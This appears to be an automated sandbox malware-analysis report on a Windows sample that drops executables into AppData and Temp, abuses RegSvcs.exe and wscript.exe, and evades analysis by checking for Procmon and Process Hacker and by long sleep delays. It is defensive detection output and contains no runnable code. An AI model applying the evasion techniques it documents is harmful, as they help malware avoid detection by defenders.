                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Switches to a custom stack to bypass stack traces
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeAPI/Special instruction interceptor: Address: 1982204
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeAPI/Special instruction interceptor: Address: 1600454
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: 8kDIr4ZdNj.exe, 00000000.00000002.2156067931.0000000001589000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000002.00000003.2165423326.0000000001987000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000002.00000003.2164617787.0000000001987000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000002.00000002.2180017227.0000000001983000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000002.00000003.2165894185.000000000197F000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000002.00000003.2164112148.0000000001987000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000002.00000003.2155325164.0000000001964000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000002.00000003.2165043158.0000000001987000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
                  Source: lecheries.exe, 00000008.00000002.2297579381.0000000001680000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXEZ
                  Source: lecheries.exe, 00000002.00000002.2179170223.0000000001948000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEORKC
                  Source: lecheries.exe, 00000008.00000003.2285714993.0000000001607000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000008.00000003.2284789709.0000000001607000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000008.00000003.2273808754.00000000015E4000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000008.00000003.2277160150.0000000001607000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000008.00000003.2283398441.0000000001607000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000008.00000002.2297331239.0000000001607000.00000004.00000020.00020000.00000000.sdmp, lecheries.exe, 00000008.00000003.2285329196.0000000001607000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE:
                  Source: 8kDIr4ZdNj.exe, 00000000.00000002.2155415967.00000000014B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEAMS
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeMemory allocated: 2D60000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeMemory allocated: 3000000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeMemory allocated: 5000000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 599765Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 599656Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 599546Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 599438Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 599288Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 599172Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 599062Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 598944Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 598828Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 598719Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 598607Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 598500Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 598391Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 598281Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 598172Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 598062Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 597953Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 597844Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 597719Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 597609Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 597500Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 597391Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 597278Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 597172Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 597062Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 596953Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 596842Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 596734Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 596622Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 596515Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 596406Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 596117Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 595877Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 595656Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 595547Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 595404Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 595297Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 595188Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 595063Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 594952Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 594840Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 594732Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 594624Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 594515Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 594406Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 594295Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 594187Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeThread delayed: delay time: 594042Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeWindow / User API: threadDelayed 3032Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exeWindow / User API: threadDelayed 6807Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeEvaded block: after key decision
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeEvaded block: after key decision
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeEvaded block: after key decision
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-102647
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeAPI coverage: 4.5 %
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeAPI coverage: 4.7 %
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424Thread sleep count: 39 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424Thread sleep time: -35971150943733603s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 3392Thread sleep count: 3032 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424Thread sleep time: -599875s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 3392Thread sleep count: 6807 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424Thread sleep time: -599765s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424Thread sleep time: -599656s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424Thread sleep time: -599546s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424Thread sleep time: -599438s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424Thread sleep time: -599288s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424Thread sleep time: -599172s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424Thread sleep time: -599062s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424Thread sleep time: -598944s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424Thread sleep time: -598828s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424Thread sleep time: -598719s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424Thread sleep time: -598607s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424Thread sleep time: -598500s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424Thread sleep time: -598391s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424Thread sleep time: -598281s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424Thread sleep time: -598172s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424Thread sleep time: -598062s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424Thread sleep time: -597953s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424Thread sleep time: -597844s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424Thread sleep time: -597719s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424Thread sleep time: -597609s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424Thread sleep time: -597500s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424Thread sleep time: -597391s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424Thread sleep time: -597278s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424Thread sleep time: -597172s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424Thread sleep time: -597062s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424Thread sleep time: -596953s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424Thread sleep time: -596842s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424Thread sleep time: -596734s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424Thread sleep time: -596622s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424Thread sleep time: -596515s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424Thread sleep time: -596406s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424Thread sleep time: -596117s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424Thread sleep time: -595877s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424Thread sleep time: -595656s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424Thread sleep time: -595547s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424Thread sleep time: -595404s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424Thread sleep time: -595297s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424Thread sleep time: -595188s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424Thread sleep time: -595063s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424Thread sleep time: -594952s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424Thread sleep time: -594840s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424Thread sleep time: -594732s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424Thread sleep time: -594624s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424Thread sleep time: -594515s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424Thread sleep time: -594406s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424Thread sleep time: -594295s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424Thread sleep time: -594187s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe TID: 5424Thread sleep time: -594042s >= -30000sJump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008F445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_008F445A
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008FC6D1 FindFirstFileW,FindClose,0_2_008FC6D1
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008FC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,0_2_008FC75C
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008FEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_008FEF95
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008FF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_008FF0F2
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008FF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_008FF3F3
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008F37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_008F37EF
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008F3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_008F3B12
                  Source: C:\Users\user\Desktop\8kDIr4ZdNj.exeCode function: 0_2_008FBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_008FBCBC
                  Source: C:\Users\user\AppData\Local\konked\lecheries.exeCode function: 2_2_00BC445A GetFileAttributesW,FindFirstFileW,FindClose,2_2_00BC445A
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED13F40 FindFirstFileA,FindClose,5_2_00007FF75ED13F40
                  Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exeCode function: 5_2_00007FF75ED06B00 GetProcAddress,FindFirstFileA,CloseHandle,5_2_00007FF75ED06B00
